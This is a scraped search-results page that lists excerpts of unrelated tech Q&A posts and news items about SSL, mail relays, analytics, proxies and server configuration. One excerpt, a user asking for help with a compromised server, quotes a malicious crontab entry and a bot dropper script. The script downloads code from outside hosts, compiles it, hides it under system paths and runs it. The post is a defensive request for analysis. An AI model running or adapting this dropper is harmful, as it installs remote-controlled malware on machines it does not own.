XKCD: Security Holes
<b>XKCD:</b> "In the rush to clean up the Debian-Open SSL fiasco, a number of other major security holes have been uncovered"
Search Results
Search found 3358 results on 135 pages for 'ssl'.
Page 85/135 | < Previous Page | 81 82 83 84 85 86 87 88 89 90 91 92 | Next Page >
-
-
Paypal PDT and IPN , how does it work?
- by slow diver
PDT Payment Data Transfer is getting the transaction data of the purchase that was made on paypal site and you want to fetch that on your own site and display to the user. Also you may want to store it in your database for archive and tracking purposes. But I cannot exactly follow the documentation here What I am not getting is Once you have activated PDT, every time a buyer makes a website payment and is redirected to your return URL, a transaction token will be passed along as a "GET" variable to this return URL. In order to properly use PDT and display transaction details to your customer, you should fetch the transaction token, variable name "tx", and retreive transaction details from PayPal by constructing an HTTP POST to PayPal. Your POST should be sent to https://www.paypal.com/cgi-bin/webscr. You must post the transaction token using the variable "tx" and the value of the transaction token previously received (e.g. "tx=transaction_token"), and the special identity token using the variable at and the value of your PDT identity token (e.g. "at=identity_token"). You will also need to append a variable named "cmd" with the value "_notify-synch", for example "cmd=_notify-synch", to the POST string. IPN I have setup Instant Payment Notification through setting according to this documentation. This is basically logging into your paypal account and enable IPN while specifying a url where the notification will be sent. This is used to complete an order so that the product can be shipped. What I did is setup a PHP page. I have created a table and whenever that page is called (or hit), it registers an entry in the table so I know a notification came from Paypal. But it does not work either. What am I really doing wrong? The first thing I want to trouble shoot though is when the buyer pays the amount, he is automatically redirected to my site. I have enabled this but automatic redirection just does not work. Instead he is shown the url as an option after payment confirmation is shown. Can someone guide my how the PDT process goes? Where do I make the request for PDT, is it along the very first request (Buy Now button) or it is sent later? Addition I found some good sampling code of how everything should work but it still does not work. I use this code http://officetrio.com/modules/free-php-paypal-ipn-script.php for IPN. I am using this for PDT. This one uses SSL, I changed SSL to regular HTTP (copied paypal version), still does not work. http://ykyuen.wordpress.com/2010/02/17/paypal-payment-data-transfer-sample-code/Read the article
-
How to: Add an HTTPS Endpoint to a Windows Azure Cloud Service
- by kaleidoscope
Technorati Tags: Ritesh,Windows Azure,Endpoints,https The process to add an HTTPS endpoint is a 3 step process. Configure the endpoint Upload the certificate to the Cloud Configure the SSL certificate (and then point the endpoint to that certificate) Reference – http://blogs.msdn.com/jnak/archive/2009/12/01/how-to-add-an-https-endpoint-to-a-windows-azure-cloud-service.aspx - Ritesh, DRead the article
-
Is syncing private keys a good idea?
- by Jacob Johan Edwards
Ubuntu One's Security FAQ indicates that Canonical encrypts connections and restricts access to user data. This all well and fine, and I do trust SSL for online banking and other things more valuable than my private keys. That said, I am quite anxious about putting my ~/.ssh/id_dsa up in the cloud. Obviously, no system is totally secure. Could some knowledgeable party, then, pragmatically quantify the risks?Read the article
-
How to correctly track the analytics when using iframe
- by Sherry Ann Hernandez
In our main aspx page we have this analytics code <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-1301114-2']); _gaq.push(['_setDomainName', 'florahospitality.com']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); _gaq.push(function() { var pageTracker = _gat._getTrackerByName(); var iframe = document.getElementById('reservationFrame'); iframe.src = pageTracker._getLinkerUrl('https://reservations.synxis.com/xbe/rez.aspx?Hotel=15159&template=flex&shell=flex&Chain=5375&locale=en&arrive=11/12/2012&depart=11/13/2012&adult=2&child=0&rooms=1&start=availresults&iata=&promo=&group='); }); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> Then inside this aspx page is an iframe. Inside the iframe we setup this analytics code <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-1301114-2']); _gaq.push(['_setDomainName', 'reservations.synxis.com']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview', 'AvailabilityResults']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> The problem is I see to pageview when I go to find the AvailabilityResults page. The first one is a direct traffic and the other one is a cpc. How come that they have different source? I was expecting that both of them is using a direct traffic.Read the article
-
Openconnect problems on Ubuntu 12.04
- by Fendrix
Getting problems on the Ubuntu 11.04 for openconnect... the failure after connecting says: Got CONNECT response: HTTP/1.1 200 OK CSTP connected. DPD 30, Keepalive 20 Connected tun0 as 172.21.246.21, using SSL DTLS handshake failed: 2 I thought it is a kernel fault so I updated to 12.04 which didn't change the message. It could be that the vpnc-script has the problem. Is there any workaround for this issue ? I already got the vpnc package and downloaded the /etc/vpnc/vpnc-scriptRead the article
-
OpenSSL 1.0.0 released
<b>LWN.net:</b> "The OpenSSL project team is pleased to announce the release of version 1.0.0 of our open source toolkit for SSL/TLS. This new OpenSSL version is a major release and incorporates many new features as well as major fixes compared to 0.9.8n."Read the article
-
what kind of certificate needed for my application ?
- by e e
I am releasing free C# softwares I've created using Visual Studio. In the future, some of these softwares might become Paid. I was wondering if I need to purchase any kind of license for them ? I understand that it's good to have a certificate for your website (SSL?), if your trying to sell your software but what about your applications ? I just don't want anti-virus/browsers flagging my application as not trusted. Any suggestion is appreciated.Read the article
-
Why does switching users completely hang my system every time?
- by Stéphane
I have a fresh install of 11.04 64bit, with 2 administrator accounts and 4 normal accounts. The 4 normal accounts (the kids' accounts) don't have passwords, they can login simply by clicking on their names. When any of the users -- either admin or normal -- tries to switch to another account by clicking in the top-right corner of the screen and selecting another user, the screen goes black and the entire system locks up. Even CTRL+ALT+F1 through F7 does nothing. This is reproducible 100% of the time on this system. I can ssh into the box when the console locks up, and by running top, I see that Xorg is consuming about 100% of the CPU. Looking at the output of "ps axfu" in bash while the system is in this "locked up" state, here is the lightdm and X process tree: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1153 0.0 0.1 183508 4292 ? Ssl Dec26 0:00 lightdm root 2187 0.4 4.6 265976 164168 tty7 Ss+ 00:43 0:21 \_ /usr/bin/X :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch stephane 2612 0.0 0.3 266400 10736 ? Ssl 01:52 0:00 \_ /usr/bin/gnome-session --session=ubuntu stephane 2650 0.0 0.0 12264 276 ? Ss 01:52 0:00 | \_ /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session /usr/bin/gnome-session --session=ubuntu stephane 2703 0.8 3.0 562068 106548 ? Sl 01:52 0:08 | \_ compiz stephane 2801 0.0 0.0 4264 584 ? Ss 01:52 0:00 | | \_ /bin/sh -c /usr/bin/compiz-decorator stephane 2802 0.0 0.3 265744 13772 ? Sl 01:52 0:00 | | \_ /usr/bin/unity-window-decorator ...cut... root 3024 80.6 0.3 107928 13088 tty8 Rs+ 01:53 12:34 \_ /usr/bin/X :1 -auth /var/run/lightdm/root/:1 -nolisten tcp vt8 -novtswitch That last process, pid #3024 in this case, is what has the CPU pegged. In case it matters (I suspect it might) here is what I think may be the relevant information for my video card, taken from /var/log/Xorg.0.log: [ 3392.653] (II) Loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/extensions/libglx.so [ 3392.653] (II) Module glx: vendor="FireGL - AMD Technologies Inc." [ 3392.653] compiled for 6.9.0, module version = 1.0.0 ... [ 3392.655] (II) LoadModule: "fglrx" [ 3392.655] (II) Loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so [ 3392.672] (II) Module fglrx: vendor="FireGL - ATI Technologies Inc." [ 3392.672] compiled for 1.4.99.906, module version = 8.88.7 [ 3392.672] Module class: X.Org Video Driver ... [ 3392.759] (==) fglrx(0): ATI 2D Acceleration Architecture enabled [ 3392.759] (--) fglrx(0): Chipset: "AMD Radeon HD 6410D" (Chipset = 0x9644) Lastly: I did see this posting: Change user on 11.10 hangs system ...but I checked, and the libpam-smbpass package isn't installed on this system.Read the article
-
How to add an exception to this rewrite rule
- by codecowboy
Hi, I need to change this so that one file in wp-admin is not forced through https: # add a trailing slash to /wp-admin RewriteCond %{REQUEST_URI} ^.*/wp-admin$ RewriteRule ^(.+)$ https://%{SERVER_NAME}/$1/ [R=301,L] This forces all requests to /wp-admin through SSL but it is breaking a wordpress plugin which needs to access wp-admin/admin-ajax.php. Is there a way to adjust the rule so that it will allow non encrypted requests to that one file? thanks!Read the article
-
Google I/O 2012 - SPDY: It's Here!
Google I/O 2012 - SPDY: It's Here! Roberto Peon SPDY makes your web pages faster over SSL than they'd be over HTTP. We'll talk about why you should care, give tips about how to take advantage of its features, talk about working implementations, and tell you about the future. For all I/O 2012 sessions, go to developers.google.com From: GoogleDevelopers Views: 290 22 ratings Time: 43:50 More in Science & TechnologyRead the article
-
Google analytics e-commerce tracking
- by crayden
Good morning or afternoon wherever you are, I am having issues with Google Analytics e-commerce tracking. On certain days it the e-commerce tracking is returning a value of $1.00 of revenue which is impossible because it is a hotel booking website. Im am so puzzled and not knowing where to go next with this. Any assistance is greatly appreciated. Thank you! Here is some code that might help, I received this from our contact who develops the booking engine. This is included on every page except the reservation confirmation page: <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-26956700-1']); _gaq.push(["_setDomainName", "none"]); _gaq.push(["_setAllowLinker", true]); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> This is included only on the reservation confirmation page: (The "${res.xxx}" elements are replaced on the server side with reservation details.) <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(["_setAccount", "UA-26956700-1"]); _gaq.push(["_setDomainName", "none"]); _gaq.push(["_setAllowLinker", true]); _gaq.push(["_trackPageview"]); _gaq.push(["_addTrans", "${res.confirmationNumber}", "Sunshine", "${res.grandTotal}", "${res.totalPriceTax}", "", "", "", ""]); _gaq.push(["_addItem", "${res.confirmationNumber}", "${res.roomType}", "", "", "${res.totalPrice}", "1"]); _gaq.push(["_addItem", "${res.confirmationNumber}", "Options", "", "","${res.otherChargeChoices.totalCostExclTax}", "1"]); _gaq.push(["_trackTrans"]); (function(){ var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true; ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s); })();Read the article
-
Oracle Application in DMZ (Demilitarized Zone)
- by PRajkumar
Business Needs Large Organizations want to expose their Oracle Application services outside their private network (HTTP/HTTPS and SSL). Usually these exposures must exist to promote external communication. So they want to separate an external network from directly referencing an internal network Business Challenges · Business does not want to compromise with security information · Business cannot expose internal domain or internal URL information Business Solution DMZ is the solution of this problem. In Oracle application we can achieve this by following way – · Oracle Application consists of fleet nodes (FND_NODES) so first decide which node have to expose to public · To expose the node to public use the profile “Node Trust Level” · Set node to Public/Private (Normal -> private, External -> public) · Set "Responsibility Trust Level" profile to decide whether to expose Application Responsibility to inside or outside firewall Solution Features · Exposed web services can be accessed by both internal and external users · Configurable and can be very easily rolled out · Internal network and business data is secured from outside traffic · Unauthorized access to internal network from outside is prohibited · No need for VPN and Secure FTP server Benefits · Large Organizations having Oracle Application can expose their web services like (HTTP/HTTPS and SSL) to the internet without compromise with security information and without exposing their internal domain Possible Week Points · If external firewall is compromised, then external application server is also compromised, exposing an attack on E-Business Suite database · There’s nothing to prevent internal users from attacking internal application server, also exposing an attack on E-Business Suite database Reference Links · https://blogs.oracle.com/manojmadhusoodanan/tags/dmzRead the article
-
Découverte de sept nouvelles failles de sécurité dans OpenSSL, des correctifs sont disponibles
Découverte de sept nouvelles failles de sécurité dans OpenSSL des correctifs sont disponibles OpenSSL, la bibliothèque de chiffrement open source largement utilisé sur le Web revient au-devant de la scène après la faille Heartbleed (« coeur qui saigne »), qui avait fait un véritable tollé sur le Web.Sept nouvelles vulnérabilités ont été découvertes dans la solution, dont l'une étiquetée comme critique, permet d'espionner des communications sécurisées avec TLS/SSL. Selon le « CVE-2014-0224 » utilisé...Read the article
-
Do You Use Oracle Exchange? Read This Important Information!
- by LindaJ-Oracle
Any change required on the Oracle Exchange instance (e.g.: SSL certificates, patches, datafix, etc.) is required to be executed first in the Test Exchange. This can also be applicable to issues where clients are using Oracle iProcurement and Oracle Fusion Self Service Procurement for Punchout to and via Oracle Exchange. See the details today in Doc ID 1681121.1 - Oracle Exchange RequirementsRead the article
-
HackerOne : le programme qui récompense les hackers, Microsoft et Facebook s'engagent pour consolider la sécurité du Web
Microsoft et Facebook sont les sponsors du programme HackerOne. Le programme HackerOne a pour but de récompenser ceux qui rapportent des failles de sécurité dans plusieurs domaines. De nombreux langages (PHP, Perl, Python, Ruby, etc.) et même certains protocoles de communication (SSL, DNS, etc.) sont contenus dans ce programme.HackerOne promet des dotations de 300 à 5000 dollars en fonction de la vulnérabilité concernée et son degré de criticité. Un jury d'expert vérifieront les propositions de...Read the article
-
??????WLST
- by Masa Sasaki
WebLogic Server?????????????WebLogic Server????????7?23?????????38?WebLogic Server???@??????????????WLST?(?????? ??????????? ?? ??)??????????????WLST(WebLogic Scripting Tool)?WebLogic Server???????????????????????????????????WLST?????TIPS??????????????????????WLST????????????????????????????????????????????·????????????(?????? Fusion Middleware?????? ??? ??) WLST?? WebLogic Scripting Tool???WebLogic ??????????????????????????·?????????? WebLogic Server 9.x???????????????????Java??????·?????????Jython??????????? WLST???????????????????????????Jython??????WebLogic Server??????????????(????)????????WLST?Jython??????????????????????????? WLST???????? WLST?????????????????????????WebLogic????????????????????????????????·????????????????·??????(???????????)???????? (WLST????????????????????????????????????????????) WLST??????Java Management Extensions (JMX)???????????????JMX??????????????????????????????????Bean (MBean)??????????????????????? WLST???????? WLST??????WebLogic Server?????????????????·??????????????????????????????????????????????????????????????????????????????????????????????????????????WLST??????WebLogic Server??????????JMX????????????????????????????????WebLogic???????????????WLST????????????????????? ???????????·???????????? ????? ???????????·???·??????WLST?????????????????????????????????????????????????????????????????????????????????????????????????????WLST??????????????????????????????????????????? ?????·??? ???.py????????·????(?????filename.py)?WLST?????????????????????????????WLST???????????????????????????·?????Jython??????????????????????? ?????? ?????????Java?????WLST??????????????????????WLST????????????????????????????????·????????WLST???????????????????????????? WLST?MBean WebLogic Server?????(?????????)?JMX(Java Management Extension)?????????????JMX???????????????Bean(MBean)?????? MBean?????? MBean????????????????????????????????MBean???????????????????????????????????????????????????????????????????? WLST????????? ? ?????? ? ???????????(MBean???)??? ? ?????????? - ??????? - ?????????? - ?? - ?????? WLST???? ??·??·?????WLST???????????????????????????????????????????WLST??????????????? TIPS?MBean???? TIPS?????????????????WLST????????????????????????????????????????????(SSL)?????????????????????????????????SSL??????????????????????????????????????????????MBean????????WLST ls?????WLST find?????JRockit Mission Control?config.xml???????????????????WebLogic Server MBean Reference????????????????? ??? WLST??????????????????????????????????????????????????????????????????ThreadPoolRuntimeMBean??????JMS?????????WLST??????????????? ??????????????????????????? WLST ????????? $WL_HOME/samples/server/examples/src/examples/wlst/online WLST????????????? $WL_HOME/common/templates/scripts/wlst ???????????????????????????????????????????????????????????????????WLST???????????????????·??????????WLST????????????????????? ?????? WebLogic Server??? WebLogic Server?????????WebLogic Server?????! WebLogic Server??????(???????????) WebLogic Server???????? WebLogic Server??????Read the article
-
IPtables AWS EC2 NAT/Reverse NAT - For Reverse Proxy style setup but with IPtables
- by Mark
I was thinking initially needing to do a reverse proxy or something so I could get some SSL/TLS traffic look like it is being terminated at a server and IP address in the AWS cloud, and then that traffic is forwarded onto our actual web servers that aren't in the cloud... I've not done much iptables pre and post routing before Dnat or Snat which I know are the things I need or a combination of the things I need in order achieve what i'm trying. Things to note:- Client/User - Must not be able to see backend IP address and only see the IP address of the cloud box https (TLS/SSL) - connection shouldn't be terminated at the cloud box, it should act like a router almost EC2 instance - Has only one network interface available to play with... this is thus an (internet <- internet) type of routing going on. EC2 instance IP address is already more or less behind a NAT that I have no control over, for example... Public ip address could be 46.1.1.1 but instance IP will be 10.1.1.1. Connections from client will go to 46.1.1.1 which will end up at the instance and on interface 10.1.1.1. The connection from the client then needs to be forwarded (DNAT) onto the backend web servers which are back out on the internet (SNAT). Possibly a part of the problem could be that the SNAT will need to be set to the external interface of the instance and I wonder if this makes it harder for IPtables to track the connection? So looking to basically, have it look as though connections are terminating at this server and its IP address. Whereas all that's really happening is the https request and connection is being forwarded straight onto another internet facing web server. How possible does that sound?Read the article
-
Is SecureShellz bot a virus? How does it work?
- by ProGNOMmers
I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] http://stablehost.us/bots/regular.bot contents are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him. It seems to me this script downloads some remote C source codes and binaries, compile them and execute them. I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server. Can you give me more infos about what this code does? About its working, its purposes?Read the article
-
Invalid configuration `noarch-redhat-linux-gnu': machine `noarch-redhat' not recognized
- by Spacedust
When I try to build rpm from src rpm (Apache 2.4.1) I got this error: rpmbuild -tb httpd-2.4.1.tar.bz2 --ba httpd.spec + ./configure --build=x86_64-redhat-linux-gnu --host=x86_64-redhat-linux-gnu --target=noarch-redhat-linux-gnu --program-prefix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include --libdir=/usr/lib64 --libexecdir=/usr/libexec --localstatedir=/var --sharedstatedir=/usr/com --mandir=/usr/share/man --infodir=/usr/share/info --enable-layout=RPM --libdir=/usr/lib64 --sysconfdir=/etc/httpd/conf --includedir=/usr/include/httpd --libexecdir=/usr/lib64/httpd/modules --datadir=/var/www --with-installbuilddir=/usr/lib64/httpd/build --enable-mpms-shared=all --with-apr=/usr --with-apr-util=/usr --enable-suexec --with-suexec --with-suexec-caller=apache --with-suexec-docroot=/var/www --with-suexec-logfile=/var/log/httpd/suexec.log --with-suexec-bin=/usr/sbin/suexec --with-suexec-uidmin=500 --with-suexec-gidmin=100 --enable-pie --with-pcre --enable-mods-shared=all --enable-ssl --with-ssl --enable-socache-dc --enable-bucketeer --enable-case-filter --enable-case-filter-in --disable-imagemap checking for chosen layout... RPM checking for working mkdir -p... yes checking for grep that handles long lines and -e... /bin/grep checking for egrep... /bin/grep -E checking build system type... x86_64-redhat-linux-gnu checking host system type... x86_64-redhat-linux-gnu checking target system type... Invalid configuration `noarch-redhat-linux-gnu': machine `noarch-redhat' not recognized configure: error: /bin/sh build/config.sub noarch-redhat-linux-gnu failed blad: Bledny stan wyjscia z /var/tmp/rpm-tmp.48153 (%build) Bledy budowania RPM-a: Bledny stan wyjscia z /var/tmp/rpm-tmp.48153 (%build)Read the article
-
Zscaler. Certs, cookies, and port 80 traffic
- by 54's_lol
So I work at HQ for a large company that shall remain nameless. We use Zscaler and I had to roll out a 2048 cert per zscaler's request. People around me at work dont understand the technology and think that the cert's are what is allowing internet connectivity. From my understanding(and please chime in) is the cookie located C:\Users\$$$$$$4$$\AppData\Roaming\Macromedia\Flash Player#SharedObjects\Q3JQJQJV\gateway.zscaler.net\zscaler.swf here that gets created when you provide your creds the first time you use the browser. The cert's are just simply a way of inspecting the SSL traffic as zscaler had no way of doing this before without them. They are essentially using the classic MITM attack to parse your SSL traffic. Gmail is smart enough to recognize this as you get a warning. My question is this, is there a product or service that I can use to verify my web browser when at home(I.E. off company network) isn't still getting routed to zscaler's cloud? If i do a tracert that will work fine. It's the port 80 and 443 web traffic zscaler and my company is after. I would like to verify that when I'm off their premise that my web traffic is using only my isp and the path to whatever content I'm searching for. Do the cert's i'm pushing and browser authentication do something behind the curtain that forces web traffic to get routed to zscaler? I searched quite a bit and would very much like to know if I'm ever off company scrutiny. I do know zscaler offers the service to force the scenario im asking about. Can I prove how my web traffic is getting routed? Thanks for any insight. I've been a fan for a long time and your guy's kung fu is very strong:-)Read the article
-
Xenserver 6.2 cannot send alert using gmail smtp
- by Crimson
I'm using Xenserver 6.2 and configured ssmtp.conf an mail_alert.conf in order to receive alerts through email. I followed the instructions on http://support.citrix.com/servlet/KbServlet/download/34969-102-706058/reference.pdf document. I'm using gmail smtp to send the emails. When i try: [root@xen /]# ssmtp [email protected] from the command line and try to send the email, no problem. It is right on the way. But when i set some VM to generate alerts, alerts are generated. I see in XenCenter but emailing is not working. I see this in /var/log/maillog file: May 27 16:17:09 xen sSMTP[30880]: Server didn't like our AUTH LOGIN (530 5.7.0 Must issue a STARTTLS command first. 18sm34990758wju.15 - gsmtp) From command line every thing works fine. This is the log record for the above command line operation: May 27 15:55:58 xen sSMTP[27763]: Creating SSL connection to host May 27 15:56:01 xen sSMTP[27763]: SSL connection using RC4-SHA May 27 15:56:04 xen sSMTP[27763]: Sent mail for [email protected] (221 2.0.0 closing connection ln3sm34863740wjc.8 - gsmtp) uid=0 username=root outbytes=495 Any ideas?Read the article
-
Cisco ASA Act as a Hardware Security Module?
- by Derek
Hello, We have a partner that is requiring us to get a HSM for a web application that we host for them. This is something new for us, we've always installed our SSL certificates on our web servers and never needed a hardware device. We currently have 2 Cisco ASA 5510 firewalls in an active/standby configuration. Both ASAs have a ASA-SSM-10 security module installed in them. The web application is a standard HTTPS webpage with no authentication required. I was wondering if we could use our Cisco ASAs to meet this requirement or if we'll have to buy another device. I was doing some searching and read about Cisco's clientless webvpn feature. It sounds like it might work, but I'm not sure. We basically want the ASA to handle the SSL and proxy the connection to our web servers. We do not want to prompt for a username or password to connect or show any portals, just display the web page. If the ASA cannot do this, does any one have any recommendations for network attached hardware security modules? We are using VMware vCenter, so we'd rather have an external device attached to the network, rather than buying HSM cards for every ESXi host. Thanks, DerekRead the article
-
How to configure postfix for per-sender SASL authentication
- by Marwan
I have two gmail accounts, and I want to configure my local postfix server as a client which does SASL authentication with smtp.gmail.com:587 with credentials that depend on the sender address. So, let's say that my gmail accounts are: [email protected] and [email protected]. If I sent a mail with [email protected] in the FROM header field, then postfix should use the credentials: [email protected]:psswd1 to do SASL authentication with gmail SMTP server. Similarly with [email protected], it should use [email protected]:passwd2. Sounds fairly simple. Well, I followed the postfix official documentation at http://www.postfix.org/SASL_README.html, and I ended up with the following relevant configurations: /etc/postfix/main.cf smtp_sasl_auth_enable = yes smtp_sasl_security_options = noanonymous smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd smtp_sender_dependent_authentication = yes sender_dependent_relayhost_maps = hash:/etc/postfix/sender_relay smtp_tls_security_level = secure smtp_tls_CAfile = /etc/ssl/certs/Equifax_Secure_CA.pem smtp_tls_CApath = /etc/ssl/certs smtp_tls_session_cache_database = btree:/etc/postfix/smtp_scache smtp_tls_session_cache_timeout = 3600s smtp_tls_loglevel = 1 tls_random_source = dev:/dev/urandom relayhost = smtp.gmail.com:587 /etc/postfix/sasl_passwd [email protected] [email protected]:passwd1 [email protected] [email protected]:passwd2 smtp.gmail.com:587 [email protected]:passwd1 /etc/postfix/sender_relay [email protected] smtp.gmail.com:587 [email protected] smtp.gmail.com:587 After I'm done with the configurations I did: $ postmap /etc/postfix/sasl_passwd $ postmap /etc/postfix/sender_relay $ /etc/init.d/postfix restart The problem is that when I send a mail from [email protected], the message ends up in the destination with sender address [email protected] and NOT [email protected], which means that postfix always ignores the per-sender configurations and send the mail using the default credentials (the third line in /etc/postfix/sasl_passwd above). I checked the configurations multiple times and even compared them to those in various blog posts addressing the same issue but found them to be more or less the same as mine. So, can anyone point me in the right direction, in case I'm missing something? Many thanks.Read the article
-
Easiest way to allow direct HTTPS connection in Intercept mode?
- by Nick Lin
I know the SSL issue has been beaten to death I'm using DNS redirect to force my clients to use my intercept proxy. As we all know, intercepting HTTPS connection is not possible unless I provide a fake certificate. What I want to achieve here is to allow all HTTPS requests connect directly to the source server, thus bypassing Squid: HTTP connection Proxy by Squid HTTPS connection Bypass Squid and connect directly I spent the past few days goolging and trying different methods but none worked so far. I read about SSL tunneling using the CONNECT method but couldn't find any more information on it. I tried a similar method in using RINETD to forward all traffic going through port 443 of my Squid back to the original IP of www.pandora.com. Unfortunately, I did not realize all other HTTPS requests are also forwarded to the IP of www.pandora.com. For example, https://www.gmail.com also takes me to https://www.pandora.com Since I'm running the Intercept mode, the forwarding needs to be dynamic and match each HTTPS domain name with proper original IP. Can this be done in Squid or iptables? Lastly, I'm directing traffic to my Squid server using DNS zone redirect. For example, a client requests www.google.com, my DNS server directs that request to my Squid IP, then my transparent Squid will proxy that request. Will this set up affect what I'm trying to achieve? I tried many methods but couldn't get it to work. Any takes on how to do this?Read the article
